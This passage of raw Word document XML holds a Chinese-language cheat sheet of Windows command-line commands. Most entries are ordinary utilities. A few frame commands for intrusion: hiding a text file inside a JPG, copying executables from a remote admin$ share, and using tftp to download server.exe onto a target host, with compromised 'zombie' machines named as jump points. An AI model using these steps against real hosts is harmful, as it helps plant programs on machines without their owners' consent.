        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2st.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的内容藏身到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1st.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3st.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>新的文件，注：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2st.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件头要空三排，参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/b</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指二进制文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ASCLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">copy \\ip\admin$\svv.exe c:\ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">:copy\\ip\admin$\*.*  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制对方</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>admini$</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共享下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>srv.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件（所有文件）至本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">xcopy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要复制的文件或目录树　目标地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制文件和目录树，用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将不提示覆盖相同文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">tftp -i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>自己</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用肉机作跳板时这用肉机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">IP) get server.exe c:\server.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>登陆后，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“IP”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>server.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>下载到目标主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">c:\server.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>-i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指以二进制模式传送，如传送</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件时用，如不加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">-i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>则以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>模式（传送文本文件模式）进行传送</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">tftp -i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>对方</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">put c:\server.exe  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>登陆后，上传本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>c:\server.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>至主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ftp ip </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用于上传文件至服务器或进行文件操作，默认端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指用二进制方式传送（可执行文件进）；默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式传送</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文本文件时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">route print  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路由，将主要显示网络地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Network addres</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，子网掩码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Netmask</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，网关地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Gateway addres</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，接口地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">arp  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看和处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>缓存，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是名字解析的意思，负责把一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>解析成一个物理性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>地址。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>arp -a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将显示出全部信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序名或命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /max </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/min  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>新开一个新窗口并最大化（最小化）运行某程序或命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mem  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">attrib </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看某文件（目录）的属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">attrib </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> -A -R -S -H </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> +A +R +S +H  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>去掉</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>某文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>存档，只读，系统，隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>属性；用＋则是添加为某属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">dir  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看文件，参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示文件及目录属系统哪个用户，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/T:C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示文件创建时间，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/T:A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示文件上次被访问时间，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/T:W</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>上次被修改时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">date /t </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> time /t </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用此参数即</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“DATE/T”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“TIME/T”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将只显示当前日期和时间，而不必输入新日期和时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定环境变量名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要指派给变量的字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">set  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示当前所有的环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>set p(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或其它字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示出当前以字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>p(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或其它字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开头的所有环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">pause  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>暂停批处理程序，并显示出：请按任意键继续</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>....</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">if  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在批处理程序中执行条件处理（更多说明见</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令及变量）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">goto </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标签</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>start”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标签）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">call </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>批处理文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>从批处理程序中调用另一个批处理程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>（更多说明见</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>call /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">for  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>对一组文件中的每一个文件执行某个特定命令（更多说明见</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令及变量）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>echo on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">off  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打开或关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，仅用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不加参数则显示当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在屏幕上显示出信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> &gt;&gt; pass.txt  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>保存到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>pass.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">findstr "Hello" aa.txt  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>aa.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件中寻找字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查找某文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">title </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标题名字</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>CMD</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>窗口标题名字</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">color </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>颜色值</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>控制台前景和背景颜色；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝黑、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝蓝、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝绿、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝浅绿、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝红、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝紫、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝黄、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>7=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>白、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>8=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>灰、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>9=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡蓝、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＝淡绿、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>B=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡浅绿、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡红、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>D=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡紫、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>E=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>淡黄、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>F=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>亮白</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">prompt </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的显示的命令提示符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>D:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>统一改为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>EntSky\ )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打印文本文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">2ver  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>窗口下显示版本信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">winver  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">format </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /FS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式化磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:FAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>FAT32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>NTFS ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Format D: /FS:NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">　目录名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
